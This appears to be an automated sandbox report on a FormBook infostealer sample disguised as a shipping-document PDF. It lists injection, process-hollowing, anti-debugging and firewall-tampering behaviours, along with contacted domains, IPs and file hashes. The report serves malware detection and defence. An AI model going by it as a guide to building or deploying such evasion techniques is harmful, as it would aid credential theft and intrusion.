Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_00409B40 LdrLoadDll,

11_2_00409B40

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.goodtasteonline.com
Source: C:\Windows\explorer.exe	Domain query: www.thesidehustler.net
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mmfaccao.com
Source: C:\Windows\explorer.exe	Domain query: www.lnvietnam.online
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.104.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.223.115.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Domain query: www.bombers.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jkformationfrance.com
Source: C:\Windows\explorer.exe	Domain query: www.alltart.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 11F0000	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1A0000	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1070000	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Memory written: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Memory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Memory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3472	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior

Source: explorer.exe, 0000000D.00000000.336648203.0000000005EA0000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000D.00000000.325394802.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

ID:	502359
Product:	CloudBasic
Start time:	20:34:38
Start date:	13.10.2021
Sample:	Original Shipment Doc Ref 2853801324189923,PDF.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e954c3d029b943b054fceb27e5e24d2d
SHA1:	927f6633500965f008ab556a0c1004c095e004ee
SHA256:	a0703367806de16bac9c75c016780c0bf3b1d8c21cf7f51b6a47b6a1aba74999
Filetype:	Win32 Executable (generic) a (10002005/4) 99.38%

Windows Analysis Report Original Shipment Doc Ref 2853801324189923,PDF.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	PE32 executable (GUI) Intel 80386, for MS Windows	E954C3D029B943B054FCEB27E5E24D2D	927F6633500965F008AB556A0C1004C095E004EE	A0703367806DE16BAC9C75C016780C0BF3B1D8C21CF7F51B6A47B6A1ABA74999
C:\Users\Public\Libraries\jqvdeyN.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nyedvqj\\Nyedvqj.exe">), ASCII text, with CRLF line terminators	CD3B33241C37E97FA912A561FCF8C86B	5A265C62E48DEE13B3227D3FD3A37EF7AD0B9642	0DEFC12CFEA776F603B2E1FE728F648E9959898C915D416C83B23DB391475E8B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[1]	data	0584CD5C8571B60FAAA2811123AC81CE	4DC74072350C1DA5B6A392B4597539BF875B01FF	D297A238CA27D092A1A7EC63CB87C629172B50184E4C7DECC2EB0B4008F81BEE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[2]	data	0584CD5C8571B60FAAA2811123AC81CE	4DC74072350C1DA5B6A392B4597539BF875B01FF	D297A238CA27D092A1A7EC63CB87C629172B50184E4C7DECC2EB0B4008F81BEE